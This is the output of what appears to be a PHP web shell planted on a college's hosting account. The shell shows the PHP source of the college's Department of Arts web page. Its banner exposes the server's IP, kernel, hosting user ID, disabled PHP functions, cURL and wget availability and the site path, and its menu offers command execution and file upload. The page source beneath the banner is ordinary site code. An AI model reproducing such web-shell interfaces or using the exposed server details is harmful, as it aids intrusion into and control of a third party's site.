|
Server IP : 2a02:4780:2b:1556:0:9c6:43c4:d / Your IP : 216.73.217.162 Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : u163988420 ( 163988420) PHP Version : 8.5.4 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail, proc_open MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u163988420/domains/aicteajmer.in/../aicteajmer.in/public_html/AACSITE/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
$meta_title = "Best BA College in Ajmer | Arts Department";
$meta_description = "Join Aryabhatta College - the best BA college in Ajmer. Discover our Arts Department and apply today for expert-led education in humanities and social sciences.";
$meta_keywords = "Best BA College in Ajmer,Arts Education in Ajmer,BA Admission in Ajmer";
$canonical = "https://aicteajmer.in/department-of-arts";
?>
<?php include 'includes/header.php'; ?>
<?php
// Array of programs
$programs = [
[
"title" => "Bachelor Of Arts (BA)",
"duration" => "3 Years",
"affiliation" => "Maharshi Dayanand Saraswati University, Ajmer",
"eligibility" => "50% in Class XII for unreserved; 5% relaxation for SC/ST/OBC with valid caste certificates.",
"overview" => "BA (Bachelor of Arts) is a three-year undergraduate degree that offers a broad spectrum of subjects in the humanities, social sciences, and liberal arts. It provides students with a strong foundation in areas such as literature, history, political science, economics, sociology, psychology, and languages. The program fosters critical thinking, creativity, and communication skills, preparing graduates for diverse roles in both professional and academic fields.",
"career_opportunities" => [
"Teacher/Professor",
"Journalist",
"Public Relations Specialist",
"Content Writer/Editor",
"Social Worker",
"Human Resources Manager",
"Advertising Executive",
"Marketing Manager",
"Event Coordinator",
"Foreign Language Expert",
"Research Analyst",
"Political Analyst",
"Media Coordinator",
"Counselor",
"Tourism Manager",
"Librarian",
"Public Administrator",
"Lawyer",
"Entrepreneur",
"Copywriter",
],
],
];
?>
<!-- Breadcrumb -->
<div class="breadcrumb-container">
<div class="breadcrumb-overlay">
<div class="breadcrumb-text">
<h2>Department Of Arts</h2>
<p class="breadcrumb-path"><a class="text-yellow" href="aryabhatta-international-college-ajmer.php" title="Aryabhatta International College Ajmer">Home</a> > Academic > Department Of Arts</p>
</div>
</div>
</div>
<style>
.breadcrumb-container {
position: relative;
height: 300px;
background-image: url('assets/breadcrumb-bg.jpg');
background-size: cover;
background-position: center;
display: flex;
align-items: center;
justify-content: center;
box-shadow: inset 0 0 10px rgba(0, 0, 0, 0.5);
}
.breadcrumb-overlay {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0, 0, 0, 0.6);
display: flex;
align-items: center;
justify-content: center;
}
.breadcrumb-text {
color: white;
font-weight: bold;
text-align: center;
z-index: 2;
}
.breadcrumb-text h1 {
font-size: 3rem;
margin-bottom: 10px;
}
.breadcrumb-path {
font-size: 1.2rem;
color: #ffcc00;
font-weight: 500;
}
</style>
<!-- Overview Section -->
<div class="container py-5">
<div>
<h1 class="fs-2 color-brown fw-bold text-center mb-4" data-aos="fade-up">Department of Arts - Best BA College in Ajmer</h1>
</div>
<div class="overview-section" style="line-height: 1.8;">
<p>
The Department of Management Studies was formed in the pursuit of academic excellence and to foster quality management education in the region. The Department represents the zeal for excellence.
</p>
<p>
With particular emphasis on quality and ethics, the department aims at the holistic development of the management enthusiasts who walk in the gates of this esteemed institution. Continuous efforts are taken by the department to match the standards of premier business schools in the country. The department offers a potpourri of experiences to its students – Academic, personal, social and industrial. This perfect blend of experiences is the key to the success of the department.
</p>
</div>
</div>
<!-- Programs Offered Section -->
<div class="container py-5">
<h2 class="heading color-brown mb-4">Programs Offered</h2>
<?php foreach ($programs as $program) { ?>
<div class="program-card">
<h3 class="program-title text-center"> <?= $program["title"]; ?> </h3>
<div class="program-details">
<div class="row text-center">
<div class="col-md-4">
<div class="info-box">
<i class="fas fa-clock icon"></i>
<h4>Duration</h4>
<p><?= $program["duration"]; ?></p>
</div>
</div>
<div class="col-md-4">
<div class="info-box">
<i class="fas fa-university icon"></i>
<h4>Affiliation</h4>
<p><?= $program["affiliation"]; ?></p>
</div>
</div>
<div class="col-md-4">
<div class="info-box">
<i class="fas fa-user-graduate icon"></i>
<h4>Eligibility</h4>
<p><?= $program["eligibility"]; ?></p>
</div>
</div>
</div>
<h4 class="sub-title">Overview</h4>
<p> <?= $program["overview"]; ?> </p>
<h4 class="sub-title">Career Opportunities</h4>
<div class="row">
<?php
$careerChunks = array_chunk($program["career_opportunities"], 3);
foreach ($careerChunks as $chunk) { ?>
<div class="col-md-4">
<ul class="career-list">
<?php foreach ($chunk as $opportunity) { ?>
<li><?= $opportunity; ?></li>
<?php } ?>
</ul>
</div>
<?php } ?>
</div>
</div>
</div>
<?php } ?>
</div>
<style>
.heading {
font-size: 2.5rem;
font-weight: bold;
text-align: center;
}
.overview-section {
font-size: 1rem;
border: 1px solid white;
text-align: justify;
line-height: 1.8;
border-radius: 10px;
padding: 20px;
box-shadow: 0 4px 15px rgba(0, 0, 0, 0.5);
}
.program-card {
background: #f9f9f9;
border: 1px solid #ddd;
border-radius: 10px;
padding: 20px;
box-shadow: 0 4px 15px rgba(0, 0, 0, 0.5);
margin-bottom: 50px;
}
.program-title {
font-size: 2rem;
font-weight: 600;
color: #D31027;
margin-bottom: 25px;
}
.info-box {
background: linear-gradient(135deg, #141E30, #243B55);
color: white;
height: 100%;
padding: 20px;
border-radius: 12px;
box-shadow: 0 6px 15px rgba(0, 0, 0, 0.1);
text-align: center;
transition: all 0.3s ease-in-out;
}
.icon {
font-size: 2.5rem;
margin-bottom: 10px;
color: #3498DB;
}
.sub-title {
font-size: 1.5rem;
font-weight: 600;
color: #2C3E50;
margin-top: 30px;
border-left: 5px solid #3498DB;
padding-left: 15px;
margin-bottom: 20px;
margin-top: 40px;
}
.career-list {
list-style: none;
padding: 0;
}
.career-list li {
font-size: 1.1rem;
margin-bottom: 10px;
position: relative;
padding-left: 25px;
transition: 0.3s;
}
.career-list li:hover {
color: #3498DB;
font-weight: bold;
}
.career-list li::before {
content: '\f058';
font-family: 'Font Awesome 5 Free';
font-weight: 900;
color: #3498DB;
position: absolute;
left: 0;
top: 3px;
}
</style>
<?php include 'includes/footer.php'; ?>